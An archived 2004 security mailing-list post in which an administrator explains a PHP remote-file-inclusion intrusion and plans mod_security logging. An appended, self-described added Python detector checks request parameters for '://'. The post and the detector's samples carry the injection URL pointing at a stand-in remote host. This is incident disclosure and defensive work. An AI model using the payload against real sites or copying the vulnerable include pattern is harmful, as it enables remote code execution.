Security Incidents mailing list archives

Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)


From: "nathan c. dickerson" <nathan () pro net>
Date: Tue, 13 Jul 2004 16:31:07 -0700

Greetings!

Thanks for the reply. I am a bit relieved to say I've found the point of entry via an include() injection.

The code was:
include($PAGE.".php");

On one of the custom scripts on the server.

Since remote fopen and register globals were enabled, this was injectable by passing:

index.php?page=http://remote.server.com/exploit

which expands to include("http://remote.server.com/exploit.php")

If the remote server served the php file as plain text, the script would be included and executed. It doesn't leave any useful logs either. I've now got to find a way to disable remote file includes, while keeping the remote fopen functionality, which is required by some of the scripts on the server.

Definitely going to get mod_security logging any php requests with "://" in the get, post, or even cookie.

Thanks for the replies

Nathan

Dmitry Alyabyev wrote:

On Saturday 10 July 2004 04:40, Tim Greer wrote:

[skip]

Sounds like one of the many PHP scripts is exploitable.  You could run
PHP as CGI w/ the suexec wrapper (and even tweak the source or use an
existing patch so PHP scripts don't need to be modified at all (other
than the ownership of some files/dirs PHP scripts need to use/write to)).

not really - you will lose authentication within PHP scripts, in the sense of receiving the password via the environment, and some add-ons like Zend Optimizer will stop working
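
Added example, not part of the original message and not mod_security's own rule syntax: a Python version of the check described above, flagging any GET, POST or cookie parameter whose value contains "://" once percent-encoding (including repeated encoding) is undone. The function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Any URL scheme followed by "://" (http://, ftp://, php://, ...).
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding such as %253A%252F%252F before matching."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def parse_cookie(header):
    """Split a Cookie header into (name, value) pairs without rejecting odd values."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value.strip('"')))
    return pairs

def find_url_parameters(request_uri, body="", cookie=""):
    """Return (source, name, decoded value) for each parameter containing '://'."""
    sources = (
        ("get", parse_qsl(urlsplit(request_uri).query, keep_blank_values=True)),
        ("post", parse_qsl(body, keep_blank_values=True)),
        ("cookie", parse_cookie(cookie)),
    )
    return [(src, name, fully_decode(value))
            for src, pairs in sources
            for name, value in pairs
            if SCHEME_RE.search(fully_decode(value))]

# Constructed sample requests (not taken from the incident's logs).
SAMPLES = [
    {"request_uri": "/index.php?page=http://remote.server.com/exploit"},
    {"request_uri": "/index.php?page=news"},
    {"request_uri": "/index.php", "body": "page=ftp%253A%252F%252Fremote.server.com%252Fexploit"},
    {"request_uri": "/index.php", "cookie": "sid=abc123; page=http%3A%2F%2Fremote.server.com%2Fexploit"},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        for hit in find_url_parameters(**sample):
            print("LOG", sample["request_uri"], hit)
```

Parameters that legitimately carry URLs (redirect targets, for instance) will also match, which is why this is suited to logging rather than blocking.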



